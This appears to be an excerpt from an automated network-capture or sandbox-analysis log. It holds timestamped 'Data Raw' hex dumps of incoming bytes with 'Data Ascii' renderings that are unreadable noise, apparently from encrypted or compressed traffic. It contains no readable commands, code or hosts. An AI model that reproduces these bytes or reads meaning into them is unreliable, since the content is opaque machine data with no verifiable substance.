                                                                                                                                                2022-09-29 12:49:27 UTC5565INData Raw: 3c 41 ca 79 ae 73 48 45 63 f3 a4 ea 16 71 9a e1 ed 02 ca 10 7b 26 d7 99 24 c3 e1 c7 f1 8d 5c 21 d5 7e 1f 18 ac a6 21 6c 11 82 97 3e ef f5 f8 4a 10 ff 57 ef de 0c aa da 4a f1 be cd a9 7e 58 f1 08 00 69 6e 21 1b 61 40 ae 1b bb 64 5e c7 73 a8 a3 3c 4c 40 39 1e 3a 00 0c 8f ed 9a 6d 51 4d 14 f5 78 50 aa 31 5b ae a9 54 93 70 65 4c 27 8e 04 32 c3 ff 75 4e 5c e3 c4 0e 41 fc 44 c8 22 8a 3d 3a 3f 1f a7 2e 3e 91 7b 6b e1 b8 06 f7 51 65 37 81 f5 98 5f ae 6d 61 68 53 c6 38 39 19 e4 4b d9 9b 47 2b ee ea 47 9f bb b5 ce b7 d8 e5 88 40 eb 8c 30 67 b4 b4 fc 4e c1 0a 4d e7 a2 07 29 22 e3 b2 3d 8c 1d 00 82 b1 82 9a 46 f4 ff ba 42 37 43 76 76 15 25 a8 44 42 41 a3 4f c8 66 0d 77 11 d2 12 fa 87 6a 4a 52 6b 21 f2 95 c6 41 c5 b2 d9 a2 1b ee 1b 52 fb 7e 88 bd 1a d8 a7 58 e8 1c 47
                                                                                                                                                Data Ascii: <AysHEcq{&$\!~!l>JWJ~Xin!a@d^s<L@9:mQMxP1[TpeL'2uN\AD"=:?.>{kQe7_mahS89KG+G@0gNM)"=FB7Cvv%DBAOfwjJRk!AR~XG
                                                                                                                                                2022-09-29 12:49:27 UTC5581INData Raw: 63 2f ac 55 2b 1c 67 57 83 2a 75 f3 38 f2 bf 58 fc cb a6 f5 96 c3 35 67 5f 43 e0 00 58 4e 3b 2b 0c 1d eb 62 58 80 50 63 1d f8 5d 9c ec 65 00 1a bb a1 9f e8 72 11 dc 64 b7 ac 57 83 a2 59 9a 7a 80 6a 5e 88 b9 56 4b b9 61 28 4f 6b 99 f7 60 4f 99 6b 92 20 b4 0a 3d 62 09 43 15 34 a8 be 80 07 d6 bb 98 9c 16 d4 b4 f0 3c 36 3e ee 16 58 31 f4 50 29 ee f0 9d 14 35 19 04 62 fe 52 4b 36 e3 e3 6d 89 c0 b5 13 7a b3 cc 58 61 00 e2 29 15 1c 2e 05 aa 0d 62 45 aa ae 75 e7 91 a5 07 84 03 a3 86 65 4f b2 a0 90 65 f4 bf c4 b0 5d 22 38 b4 2f f8 f7 07 a7 73 7b a7 db 1d eb 57 46 29 06 bb 92 fa 02 0e e5 d7 0b cc cf 6b 1d e2 24 e0 67 63 a2 8b 01 9e 4f 93 57 27 9e 64 e5 6a ec 28 dd 33 b6 bb 7d 29 c9 31 6c 74 e9 0c b6 0c 74 f2 9b c5 12 d5 b3 e1 cd e0 05 76 c0 c6 a0 30 31 2b 22 bd 77
                                                                                                                                                Data Ascii: c/U+gW*u8X5g_CXN;+bXPc]erdWYzj^VKa(Ok`Ok =bC4<6>X1P)5bRK6mzXa).bEueOe]"8/s{WF)k$gcOW'dj(3})1lttv01+"w
                                                                                                                                                2022-09-29 12:49:27 UTC5597INData Raw: b8 7c 09 d0 58 51 f0 9b a5 5e c4 65 64 82 ae 0b 42 ba f2 39 d0 be ff d1 22 cf de 8f 09 89 64 d7 3e a7 51 b8 17 cb b3 5d 68 89 a8 33 7b bb 91 71 d3 87 3c 4c 6d 7b 09 a1 7e 80 24 ee 46 cf 1b 91 64 8d 3e 6d b0 7b e4 74 14 e3 c8 eb f7 f8 9c 1a d8 f2 93 b0 63 a1 ca a2 2a 12 aa e8 7e 96 fa 3f 0a 83 21 e3 e0 fb b2 3d 2a 99 4f 49 c2 10 96 6b 7c 63 db ef c7 10 f8 78 8f 71 fc a8 b6 88 14 29 85 a4 9b 1d ff 07 c4 6f 62 ef 1c b6 08 5e 92 bc 46 7b 8e 21 1d 68 6d 96 1c 55 03 61 ea 9b cc 27 87 85 c8 4e 1d 54 9d f7 b9 ee 36 cf 46 40 91 de d4 40 e2 6b 72 6d d6 f7 ec f7 1b f4 9b cf dc 15 4d d9 19 cf 3c b5 9f 47 18 41 06 ad 91 8c f5 f7 6c 66 2d 08 5a 0d b0 14 18 9f f2 24 aa e1 ce 04 33 38 03 27 12 2f 5e ab 42 89 ce cd 38 18 c4 01 89 59 36 b6 1c c8 71 2d 1c 97 de bd f8 d4 ff
                                                                                                                                                Data Ascii: |XQ^edB9"d>Q]h3{q<Lm{~$Fd>m{tc*~?!=*OIk|cxq)ob^F{!hmUa'NT6F@@krmM<GAlf-Z$38'/^B8Y6q-
                                                                                                                                                2022-09-29 12:49:27 UTC5613INData Raw: e2 d4 a1 8e b8 44 91 ed b7 b3 31 2e 93 55 fb 0e 32 a7 14 3b c7 d4 0f 10 09 6b 3f 5e f5 70 3e 1c 20 b5 1b c0 54 95 5c 80 c0 80 3f 29 d7 79 29 1f 1a d6 7f a2 06 20 e9 f2 be 66 bd 71 07 39 91 0c 70 b1 2a cb 8d e8 2c a3 56 c4 ba f1 96 5e 19 d6 16 ed 64 f1 00 f1 7f 17 1c 7d a5 81 43 53 ff df fa 00 81 c7 a8 aa c9 82 88 41 9c d9 99 fb 0e fa 99 74 28 27 f5 00 59 3d 55 7b 66 c3 bf 2f de 21 7d d9 35 c3 12 2b 46 0d ed 09 17 78 0f 6c 69 c7 18 a5 31 41 ff d4 7d 5c 8a 5f dc 56 ab 08 55 6e fa 9a 51 7a 19 e6 81 dd 6d b9 9d 2f 05 48 e6 d6 b7 ba c6 a2 53 1d 41 c0 4e 23 17 60 5f 59 ab f5 1d e0 73 42 d2 4d 47 22 5f 7c 95 6c 86 44 9d 1c 6e f0 e6 e4 c9 b3 0a c1 5e 33 d4 e6 a2 0d 37 a8 62 3a 74 b8 9d 12 c9 fd 76 14 44 32 f3 2a 44 83 60 c6 bb bf e7 97 e9 92 49 f2 fb e6 39 c4 da
                                                                                                                                                Data Ascii: D1.U2;k?^p> T\?)y) fq9p*,V^d}CSAt('Y=U{f/!}5+Fxli1A}\_VUnQzm/HSAN#`_YsBMG"_|lDn^37b:tvD2*D`I9
                                                                                                                                                2022-09-29 12:49:27 UTC5629INData Raw: c9 52 a3 ba 9b ad b1 6b 9c a0 68 39 a8 2e 28 9c 58 83 d6 39 be a4 e7 24 ba 51 3a ba 73 69 d7 4a 26 86 e0 44 1a 02 d5 ba 9a 8d e0 7c ab a4 30 f8 36 54 b8 13 d8 12 8e e5 3d 64 bd da 11 d3 03 3b c7 5a 50 09 d8 3a 62 d9 b4 bc 56 3c 70 95 b9 04 9a 1a 3f 13 74 7e 7d 05 78 4c e5 f5 3f 10 9b d4 64 68 f1 58 0f 4a 87 4f a4 61 7b 7d 99 7e 67 d0 8d 2c 58 5e 4d 1d ee be 37 23 8d 12 14 7e 7c 4a 1c b9 fa 20 66 6f 8f 67 a6 6e 1c 4e bb c7 a5 5b fc 24 b2 fc f0 8a 5b 79 0c 2b 83 31 d0 f4 79 0e 6f fc 7c 9d f3 f4 18 ea 81 5b 4d 26 4f 52 b7 2a 06 f9 f0 c4 66 e4 51 52 9e 6f 02 22 c7 5e 3e 0f 2f aa cf 1c d5 49 9e 72 a2 f0 28 f2 31 2a cf e9 a9 6f 99 50 1e 31 76 15 be e8 e8 96 fd 68 92 ed df c1 46 65 8d e9 5b b1 09 91 bb ea 92 aa de 94 40 16 c3 c7 b2 f8 94 d6 23 5a df 95 cc 14 2b
                                                                                                                                                Data Ascii: Rkh9.(X9$Q:siJ&D|06T=d;ZP:bV<p?t~}xL?dhXJOa{}~g,X^M7#~|J fognN[$[y+1yo|[M&OR*fQRo"^>/Ir(1*oP1vhFe[@#Z+
                                                                                                                                                2022-09-29 12:49:27 UTC5645INData Raw: d2 a1 78 a9 2b 66 36 7b 65 b5 23 20 a7 92 e8 f9 4c f9 d1 2d 21 66 ee 84 23 8d 83 f9 a8 13 a3 5c 64 fd 15 b6 fe bb af 62 0a da 6b d7 ca 35 ca 6c cc 23 67 39 6b 2b 7d 75 f7 e1 93 79 14 1d 99 c4 f2 6f e7 5d 3b 55 de 78 bc 0d 88 e2 a6 79 d8 19 80 87 5b dd 58 b4 c1 43 6f 22 e9 0f fa 68 79 d4 42 fa 8c 70 f8 ff ee 46 6d bd 0d be 51 a1 4a 3c 2b b7 c9 6a b1 a6 63 e3 1e e1 ba 23 d5 c2 d5 e8 1e 9e a1 d8 c3 1a e1 a0 d8 95 a2 c6 e6 c7 ff 7c a8 5f d4 65 fd 59 0c cd cf 17 8b 3f a0 93 4c 2b ff f8 67 c5 52 73 3f 39 cb ad 71 e5 af 74 a0 dd 1e 73 82 28 1b 74 aa 67 ee f4 2f 7a 43 45 96 c6 01 b8 37 a1 d9 23 59 87 b5 00 97 7f 9b 0a fa 24 b4 bf da 25 e9 7a 43 1b 40 00 db 48 a4 ca 82 20 35 3a 4b ee a2 45 62 cf 92 06 dc a7 2a 4c 13 e7 ca 04 80 83 cf 6a 3d ec 69 81 21 89 2c 08 ad
                                                                                                                                                Data Ascii: x+f6{e# L-!f#\dbk5l#g9k+}uyo];Uxy[XCo"hyBpFmQJ<+jc#|_eY?L+gRs?9qts(tg/zCE7#Y$%zC@H 5:KEb*Lj=i!,
                                                                                                                                                2022-09-29 12:49:27 UTC5661INData Raw: e4 7a c3 d6 43 0d 9b ae bc 73 33 29 7d a1 4a ea b4 38 26 ab a1 f9 1c be 8b 10 41 bd 3d f1 f8 ec b1 97 67 59 25 bb 86 e9 3f fd 3b 6e 99 09 1c e6 5b 17 15 ad 03 48 44 34 b1 3e 8d a5 12 38 fa e8 90 5b cb ea 5c 02 99 1e aa 45 80 74 d4 12 08 7a 71 7b e7 c8 48 17 c5 fd 99 15 de d2 7a 74 8c 09 79 c9 49 ec ce 1c 49 29 b1 22 7d 6a 5d 1a 2a 96 cc 91 3a 98 26 ae 13 05 43 e4 61 9e 5b 0b 91 dd 33 4c a0 16 ff c7 09 6b 5a 03 12 b8 6b 7d 75 f1 4f 2f 30 1d 5b f8 b3 b6 8e e4 58 a6 b2 61 d4 87 de 7f 79 cf 5f 59 15 0c f6 dc e3 cb cb f4 53 8d 99 0a 9b ea 66 de 99 92 29 48 de f3 db 55 43 66 b3 79 94 e5 b8 5b 81 30 3f 79 26 03 7f e3 fb 4b ba 2d e8 f3 28 b7 a7 24 7e 9b 91 bd be 9f 0c 6a af 8c c6 63 e4 8c 43 27 9a 1c 87 c2 fc 5b 35 83 31 db ed e0 c2 df 43 67 95 5a b0 51 4e 38 90
                                                                                                                                                Data Ascii: zCs3)}J8&A=gY%?;n[HD4>8[\Etzq{HztyII)"}j]*:&Ca[3LkZk}uO/0[Xay_YSf)HUCfy[0?y&K-($~jcC'[51CgZQN8
                                                                                                                                                2022-09-29 12:49:27 UTC5677INData Raw: 8f 6c f2 e4 6e 23 4b fd f3 d8 89 1a fb 10 53 07 5c 21 e2 17 21 2b a2 d7 70 8e 11 70 e7 71 cc 25 fa 9d de 67 d5 b2 e2 67 02 b7 83 e5 4d 7a 4e 16 c2 6e 83 ad b0 22 b1 f8 58 fd 6e fd 54 a3 4d c9 5a 89 4c 13 8c 88 ab 4b 31 09 f1 c8 7e 0b fa 98 92 24 0e 2c ff fe 76 1a f9 63 2c 93 e7 47 06 45 8d fb d7 01 ce 53 ea f1 49 8b 9d b2 9b e4 7f 03 f6 94 a1 f6 97 04 60 ba 5c fa 17 94 f3 bd dd 96 a6 a4 ac 3d 25 64 40 a5 59 d3 7c 0e 4d 41 15 44 1b 9d af 3c 5e cc 4b 35 18 6b e9 4f 08 ee 3f 3e 99 79 3b 0a f3 1b de 35 7b 15 ef cf fb ea 0f 8e 9f d3 d9 c4 8e 37 33 16 b1 51 99 ac eb 91 34 8c 78 e1 4f 5f ea d0 99 ed 32 4a 13 b2 de 30 e6 b8 aa a7 91 74 0c 08 33 11 f2 9d f3 e1 83 e6 f7 f0 0f 2e 8a 18 da ff 11 50 2b 92 dd 31 23 72 e6 3a 7c a1 69 4e b3 c5 0b 2f d3 65 b3 c2 eb 09 a7
                                                                                                                                                Data Ascii: ln#KS\!!+ppq%ggMzNn"XnTMZLK1~$,vc,GESI`\=%d@Y|MAD<^K5kO?>y;5{73Q4xO_2J0t3.P+1#r:|iN/e
                                                                                                                                                2022-09-29 12:49:27 UTC5693INData Raw: 18 c9 9b 80 84 2d fc 13 16 33 50 87 05 c1 0a ec c6 c2 fb 43 a1 29 9c 32 d3 ed 00 4a ab ec bf 8d 69 91 72 fe 84 76 7a 57 42 1d a6 bd 53 ff 2d 99 9d 46 5f dc 72 c7 9f de c6 37 3c 1a c9 10 7d e1 4c 7a 82 5d 6e b6 c7 3c fa b9 57 0b a3 85 2f da 22 b8 0b 3b 9d 78 44 79 c3 92 e9 13 02 10 16 f7 64 44 e5 e3 e7 2f dc 30 30 9b ae ef 57 1a 02 09 fb 45 00 32 39 67 a0 a1 a1 fb af f9 49 9f 4d 4b 02 d9 e2 f8 ab b8 0e 41 d7 0c 4d 46 99 ee 77 40 9b 8c 4a d7 a3 74 d3 a6 d7 63 dd d3 60 78 67 93 5d 1c 94 4b 60 f7 a7 5f 60 48 dd f1 ed f8 87 f7 6c 9d 5b b6 d0 b0 18 b1 49 c2 1a e4 b7 8d 84 2d 06 e6 37 26 bc 01 85 44 33 b7 09 c4 2f f6 12 b8 c7 12 54 aa a9 c8 8d f0 ed 25 01 cf e0 fb 39 22 ac 0d 4b 66 69 ac 8f a6 8e a6 65 e8 0c c1 c4 40 5e cb 7b f9 75 db df d8 00 31 86 e8 b3 7b cb
                                                                                                                                                Data Ascii: -3PC)2JirvzWBS-F_r7<}Lz]n<W/";xDydD/00WE29gIMKAMFw@Jtc`xg]K`_`Hl[I-7&D3/T%9"Kfie@^{u1{
                                                                                                                                                2022-09-29 12:49:27 UTC5709INData Raw: 5b 40 d7 5d cc 95 dd e8 22 1c 1d 81 c8 45 ef a1 bb 52 91 7d dc 79 f3 07 76 d2 b0 1e 11 23 46 77 9d b9 9f 95 80 38 03 d4 5b d8 3a e6 76 e3 32 09 9f 74 7f 72 47 58 ac 26 39 61 6b c1 10 42 02 ab 16 96 75 08 61 ee e4 7b e1 55 e0 b1 ce 6b a5 c6 82 d7 2b 90 55 8c 84 26 47 27 a6 fd 1f f3 bd bc d5 be 96 18 a9 ac 57 12 e4 12 18 f2 4e f7 ba 21 7e fb 08 51 f3 f4 fb c0 34 02 7c 1c 2e 61 c0 3d f5 39 7d 59 74 d7 b1 37 83 1e 51 af 52 86 e2 a1 e6 4b a4 f2 a1 9d 68 36 2d 5c 68 b7 42 6f 05 d6 25 2d 7a 64 6f 6e f3 5c d1 cd 60 42 51 3b ee 24 a6 f8 d7 ca 4e d7 20 29 58 f2 12 24 43 e4 e3 89 af 19 9f bc bb 72 62 2d 4c d6 3d 3b dd 79 e2 43 eb 4f 50 36 96 b4 9f 09 f3 d0 e7 16 e2 ab 02 d3 ea 7f 3e 10 0b f6 d0 a4 40 ff 4d dc d4 1b bb 23 52 25 0c 98 03 e4 d9 6b fd c8 07 96 ec ca 39
                                                                                                                                                Data Ascii: [@]"ER}yv#Fw8[:v2trGX&9akBua{Uk+U&G'WN!~Q4|.a=9}Yt7QRKh6-\hBo%-zdon\`BQ;$N )X$Crb-L=;yCOP6>@M#R%k9
                                                                                                                                                2022-09-29 12:49:27 UTC5725INData Raw: 69 22 60 a2 b0 ab 37 be ec c3 c5 2f cd 11 29 26 4e 41 f7 38 04 db 02 8e eb 56 b2 04 5c b7 3a b9 fc 05 be f6 da 5f 9a a9 20 b3 fc d1 9e 41 61 ca 45 56 b2 68 6b 30 89 c0 88 a0 39 1f 46 be 94 cc 72 68 12 b1 2d 74 f6 a3 d6 96 13 74 87 ab 86 2a 17 4d 96 96 50 e6 67 2c f4 bd 00 5d 1e 09 cb 37 6b f5 68 0b 62 56 8d 1a 27 9c 25 d6 71 dc 97 8a c2 82 12 52 32 76 d2 d5 f8 00 e5 7f 56 e9 26 c8 df 17 a2 61 06 f1 65 d5 23 59 53 96 04 0c 49 b7 5a 03 e5 3d 4e 78 ce d7 91 da c4 4b 08 84 b8 21 7d f5 ed 03 ac ee 26 64 e9 d1 6d 9b 5d 2c bf 2a 43 b0 a2 ad 15 d8 50 e3 14 c9 44 ed 72 79 e5 00 ef 1f fb 4d df 25 cc f6 18 be 92 82 a3 c5 ff 4b eb 7d bb 92 7e 13 47 ba d6 4a e1 0b 3f f0 52 c2 49 cf dd f1 45 f3 7f 31 79 5b 82 23 71 6a 66 39 08 57 49 09 2a 9b da 96 de fe 9b 8e e3 97 9f
                                                                                                                                                Data Ascii: i"`7/)&NA8V\:_ AaEVhk09Frh-tt*MPg,]7khbV'%qR2vV&ae#YSIZ=NxK!}&dm],*CPDryM%K}~GJ?RIE1y[#qjf9WI*
                                                                                                                                                2022-09-29 12:49:27 UTC5741INData Raw: 09 53 93 02 88 66 f2 c4 22 3e fa 2b 9f 5e d3 76 d5 eb 41 a8 94 8a 75 6b e3 c0 ee 84 6d 55 9b 79 88 cf 00 7d 04 f3 82 46 71 73 7a 08 b8 79 25 b7 69 e3 e8 44 3b 1c 87 8f 83 c3 eb 14 96 ce c7 36 53 11 1e fe b4 c5 c6 95 f9 4a c0 5f e9 b4 4e 48 28 f6 01 f8 cd 26 b1 74 54 2e 69 ef 73 b9 80 e0 25 1a 0c 47 93 fe a5 94 07 18 c5 f8 ab 83 80 6a c8 8d 23 ea 9d 6a 14 68 bb 87 e4 66 03 57 cc 8c 9f 80 74 67 23 ee e0 3d ac eb 09 42 d6 fb 60 ca c2 4d 81 5d bb 58 af 0f 83 21 6c 7e 88 6d f1 e1 d4 24 16 03 54 7d ee d2 9a 3b e9 06 1c 5d fd 96 dd 69 bf 73 f3 c6 b7 da a6 a0 02 16 aa 79 9f 4a 89 f7 25 93 6e 2a 8b e8 1a cf 64 98 9a 45 36 db 1d f2 a7 49 de f6 1c 30 ea 2e 74 9b 8c 6a c0 d1 1d a3 06 ed e6 d2 3c 4b 0f 41 75 bd 9a 48 34 5a b7 1a c0 14 2e 3f d4 27 ff 9c a2 41 f7 53 49
                                                                                                                                                Data Ascii: Sf">+^vAukmUy}Fqszy%iD;6SJ_NH(&tT.is%Gj#jhfWtg#=B`M]X!l~m$T};]isyJ%n*dE6I0.tj<KAuH4Z.?'ASI
                                                                                                                                                2022-09-29 12:49:27 UTC5757INData Raw: 18 3f 3c 13 d0 3d 58 b6 b3 1b 40 2f 42 b9 a5 37 2f ee 79 7e b9 c1 1f 1e 3d 2f 7c 1d d2 71 25 64 77 b5 c2 1e eb 5c d7 9f 5d a9 3e 84 9e 7f a9 e5 26 8e 28 c4 d6 1e 5f 5e 4a 49 db 06 30 77 cf 6a 9a 43 79 b2 a1 bf 74 dc 05 ab a1 ec c4 e0 c4 cf fd 70 53 7f 9b 94 e1 a3 28 c6 4c b4 c6 db 8a 26 01 7c 05 31 d6 41 c7 43 bd 06 7e bc dc 2e 15 8c 2e c3 b2 2f 23 09 be fc 0c 20 a1 5c 6f 04 48 40 12 cd fa 64 83 4a d9 c2 77 63 d5 b4 1d 23 a0 48 b5 ec 15 10 e2 17 c4 0b 40 7f c5 1b e4 69 8d 62 31 de 10 5b 82 12 3c 6d 8f fb cc de 13 73 cb 37 7a f4 90 72 3b ab 82 04 a0 0c 9d 8d 5c 07 5c 21 f4 0a 2e b1 d3 4f 88 6b 65 52 45 d8 3e e1 2f 30 d4 1a 35 18 c4 b0 d5 19 b0 67 27 c8 e2 25 21 ec 31 a5 2d e3 14 91 6e 26 b1 97 85 99 6f 7b d1 63 fa d1 e2 45 24 bf 8d e6 dd 82 7f 76 15 d9 f1
                                                                                                                                                Data Ascii: ?<=X@/B7/y~=/|q%dw\]>&(_^JI0wjCytpS(L&|1AC~../# \oH@dJwc#H@ib1[<ms7zr;\\!.OkeRE>/05g'%!1-n&o{cE$v
                                                                                                                                                2022-09-29 12:49:27 UTC5773INData Raw: 08 a4 dc ca f3 a7 1f 89 de 30 37 ec 50 74 cf 5f 8c 53 a4 2a 16 f3 4f 48 36 0e 2d 84 fb 7d 29 4e 32 99 16 9b ab c1 b6 8e 5d da 1f f6 61 c4 24 e9 05 4b 0b f2 cf c8 0c 85 d7 50 af 3a b3 b8 99 51 ba a2 f6 d7 6a ca da a5 51 18 d0 98 34 98 31 77 36 0d d6 89 39 72 39 3f 17 6d d9 85 95 76 c4 cc 3b 0b aa f4 bb ef 4a cb e0 64 d4 18 60 e6 b3 92 22 97 9c 9a 7a ff d7 aa 92 a5 e1 c6 0c 69 53 d0 61 74 75 db 37 dd 4d a5 4c 01 f7 31 4b 6a 12 49 6b 52 e6 4c 22 56 6a 0f 2e 88 ca c8 10 ca a8 26 99 4b e5 c6 64 93 ee 4e 0e 1e fe 1b cd 9e 81 01 b8 7e ff 31 90 51 8b 44 87 3e b5 73 93 6a 48 45 90 08 57 c4 69 ec 3b 3d 14 6c 52 fe c8 1d b2 0a b7 8c c9 09 f1 2a fc fe 71 47 37 3e e4 61 78 6e 29 70 75 3f 81 e1 58 5c 87 39 96 3c 7d 5a cc dc 94 bf d1 f9 64 28 2e fc 82 ea 58 c3 7a 09 25
                                                                                                                                                Data Ascii: 07Pt_S*OH6-})N2]a$KP:QjQ41w69r9?mv;Jd`"ziSatu7ML1KjIkRL"Vj.&KdN~1QD>sjHEWi;=lR*qG7>axn)pu?X\9<}Zd(.Xz%
                                                                                                                                                2022-09-29 12:49:27 UTC5789INData Raw: 81 92 4f 3b ff 3d 56 05 a0 65 20 29 38 04 8b 66 95 5b 86 e7 80 b1 77 5a 6e 56 3c a7 87 0f f6 9d 9d d5 e2 92 b7 cc fd 11 e1 f2 ef ca 94 1f 7f df f1 9b 2e fa 3d 2f 7b 7c 7b 08 21 d7 1a 7b c8 7d 49 4c 88 8d 43 f8 a2 49 61 9e a7 9c c1 33 93 3d ee 81 5b de c3 f3 2a df b3 3d c0 eb 7f 8d 11 3a c8 7a 41 7d 0c d8 0e 56 86 f1 75 6a 03 f1 75 fa c7 78 94 c0 0a b2 5b a7 1a fe 9f a7 06 1a 59 19 17 31 98 24 8d b0 e7 79 56 01 f7 42 ab 44 5c 4d 00 95 46 3c e5 7d 7a ab d4 b4 06 f0 58 53 af ec e7 1e 03 e4 b9 50 06 29 aa a8 47 ee 71 69 9e 56 03 8b b9 d7 9f 68 8c fd e1 a2 fc 8b dc 20 7c 9f 0e 1a 2b eb ba 15 c5 45 03 d0 3d 21 09 fd c3 18 99 5b 7d dc 75 08 8f e8 38 d6 d4 dc 0f 23 b5 68 09 fd 77 81 bf d2 58 21 f6 a6 7a 86 f6 18 42 f2 cd 50 f8 67 da 22 ca 86 16 84 b6 e5 c8 3d bf
                                                                                                                                                Data Ascii: O;=Ve )8f[wZnV<.=/{|{!{}ILCIa3=[*=:zA}Vujux[Y1$yVBD\MF<}zXSP)GqiVh |+E=![}u8#hwX!zBPg"=
                                                                                                                                                2022-09-29 12:49:27 UTC5805INData Raw: fa 95 38 0a 01 90 b0 de af ee ba 4f 4f e3 12 8b 38 cb 82 82 ae ab 50 e6 de 1f 82 c7 44 86 1b e4 6a e4 87 e3 e1 45 0a 2b 21 ee 80 0d c2 10 2a 83 83 c0 f9 ca 80 d5 8d df 7e c5 92 9a af 69 fb 8d e9 78 b0 ce 5c 60 e7 63 97 c9 af f4 8c 62 ce 9e e5 ad a2 40 b0 86 fc d1 c6 fc 70 4e a2 58 8a 47 7b d1 9a a4 43 2d 89 53 f6 e6 8f b9 66 61 d4 93 7b 1e 66 dd d1 c1 27 f6 d1 51 e5 b0 18 c6 43 22 4e 5c 0d 1c 2a 11 fa 2e 5c 81 72 ab 5e f3 ee 18 59 f9 63 47 00 a1 e4 e6 19 fb 8f 8f e3 ff 76 e1 53 49 2c 29 7f 47 2b 83 3d e5 9e 64 0d 4e 6c 0b b5 c0 5d 44 de 64 21 bf d9 60 5f b6 04 6d 8c 33 e8 e3 5f 2e cb d8 4e ba a0 29 52 5a 60 98 da 75 18 3f c8 8c af 9a a7 3d 2d 92 0c 4d a0 37 2e e4 57 9e 2b d5 96 ad 32 1c 7b 5a 0f a5 2a f7 23 69 43 b4 ce d1 7a cf 11 34 d5 c0 38 55 44 61 28
                                                                                                                                                Data Ascii: 8OO8PDjE+!*~ix\`cb@pNXG{C-Sfa{f'QC"N\*.\r^YcGvSI,)G+=dNl]Dd!`_m3_.N)RZ`u?=-M7.W+2{Z*#iCz48UDa(
                                                                                                                                                2022-09-29 12:49:27 UTC5821INData Raw: c9 fa 0b ec 82 2d 01 dc 70 73 c6 89 b7 65 27 23 37 a5 16 4a 41 df fc a2 12 8e 34 04 cc b4 99 31 50 08 f1 d9 29 3e 3d 0b 58 dd 1a 65 6c 33 19 47 cc 83 23 20 5c 7f 26 87 3a 53 a9 3a 9e bb 8e 0b 5f 90 e4 de 70 07 a2 df 4e 0a 8f 89 cb 1e 1d c0 93 1e d0 29 bb 4a 24 49 1a 47 47 64 1e b3 4d 26 a0 53 40 6b cb e1 64 a3 cd 33 a1 e8 e9 ff c8 58 8e e6 99 32 c5 bd 63 ee 53 cf 07 3d a6 63 5a 20 15 ec 91 e4 64 c8 b3 a7 3c 7e 28 c8 08 56 ad c1 32 c3 b3 03 5b f3 76 1f 75 60 c1 64 7b 1d 1b 0f c6 56 1c d6 ef e1 c4 52 ad 5a 46 dd f9 84 e2 45 30 68 cd c4 0d 18 e7 a8 0a ab 6e 31 50 6a 5f ef 62 32 69 5a ab 6b 57 c9 8d bb 38 e7 a2 31 cf 9d b7 d4 b6 5f 1a fe 5a 02 73 4a 7a 10 03 b5 6f 79 85 5a 85 67 20 cd e0 2a ef 42 59 9d 8b 58 a4 e0 46 ee 8b b5 66 bb c2 b4 20 70 e4 4d 8c d7 98
                                                                                                                                                Data Ascii: -pse'#7JA41P)>=Xel3G# \&:S:_pN)J$IGGdM&S@kd3X2cS=cZ d<~(V2[vu`d{VRZFE0hn1Pj_b2iZkW81_ZsJzoyZg *BYXFf pM
                                                                                                                                                2022-09-29 12:49:27 UTC5837INData Raw: 22 30 f9 b0 ac c7 8e 2a fd 94 d2 77 93 37 76 cf 6b 75 5f 25 91 70 19 62 ec b9 ad 4b 60 a0 14 3f 5e 45 44 cb c9 87 89 26 df b6 a7 fe 6c c7 35 c2 2b f9 55 21 49 4c be 3b 69 8b 06 45 9e 90 47 80 c5 5c 81 01 d9 f3 9a d3 6d 0f 31 99 c7 40 73 2d 45 45 d6 1f 91 33 e2 a1 17 95 b7 37 a0 10 b1 94 13 0f 9d 72 42 e3 50 67 a7 94 b9 85 8a 46 10 ad ab 53 2e a8 fd b7 a1 9d 0b 9a 37 f2 4f 26 71 6a 58 78 27 f1 26 0d 4e 31 23 40 25 5a b7 d3 85 9b 6d 66 94 db 29 bd 2a 38 ff 3f c8 d5 08 42 6a 37 24 10 96 48 f1 c7 c4 d0 23 5d c3 f7 d2 59 d2 62 d8 f8 93 2b 67 ab a1 e9 d2 e4 95 72 b0 98 11 34 2d 33 af 49 39 9b a3 8b 3e d6 b9 3f bd 82 f5 c6 3c cb f3 83 1c 9d ba f8 2f 3e 75 51 7d 23 60 01 44 ce 1d 3c cc d1 e1 9c 10 b2 73 e8 cf 87 79 67 a5 74 e1 ba 38 ae 24 c9 82 e6 52 26 23 a4 94
                                                                                                                                                Data Ascii: "0*w7vku_%pbK`?^ED&l5+U!IL;iEG\m1@s-EE37rBPgFS.7O&qjXx'&N1#@%Zmf)*8?Bj7$H#]Yb+gr4-3I9>?</>uQ}#`D<sygt8$R&#
                                                                                                                                                2022-09-29 12:49:27 UTC5853INData Raw: 2b 27 aa b9 23 3b 48 46 5a 79 12 76 af d4 bc 2e 9b 74 f6 b0 c2 0b 2d d4 97 39 b7 d1 2b 5b ae ec e0 32 50 64 3b 37 68 ea 01 84 c2 6a 3a 65 0b 1c b4 45 28 71 20 7b b1 a9 4a 9e 52 0d cc f6 12 0a a1 1b d2 98 07 6f 5d cc 9e f3 99 4c bd f2 c8 b6 5a 73 c0 9c d3 a5 49 f2 19 f0 7b 92 de 7a c4 fd db 6d b4 1d 9f f8 c6 e8 c3 01 38 7d 63 b8 12 4a cb cd 95 f6 7e 38 2f a9 da f7 df 02 34 9a a6 43 a2 06 cf 37 94 f8 2e cd 77 cc 37 0d ef 3d 2e 02 e6 b0 8f 05 a9 28 50 e2 48 47 b9 d6 cc 12 0c 3b 64 05 f9 9d 5e 87 e9 32 75 be 29 56 96 d3 de 8b 6d b9 46 f0 e8 ad c1 4d 77 b3 24 a8 17 eb 5d 74 f7 09 40 2c 35 ed a4 66 3b de 71 24 d3 0b e7 47 5e e7 36 a3 c5 cc 23 cc a5 dc 42 7c 1d b2 2a 7e c7 60 1e 03 db 56 1f a7 5a 5b 3b 42 15 40 f0 24 cd 8e 24 70 3d e9 be 34 2d 3e d9 bf f9 6a 54
                                                                                                                                                Data Ascii: +'#;HFZyv.t-9+[2Pd;7hj:eE(q {JRo]LZsI{zm8}cJ~8/4C7.w7=.(PHG;d^2u)VmFMw$]t@,5f;q$G^6#B|*~`VZ[;B@$$p=4->jT
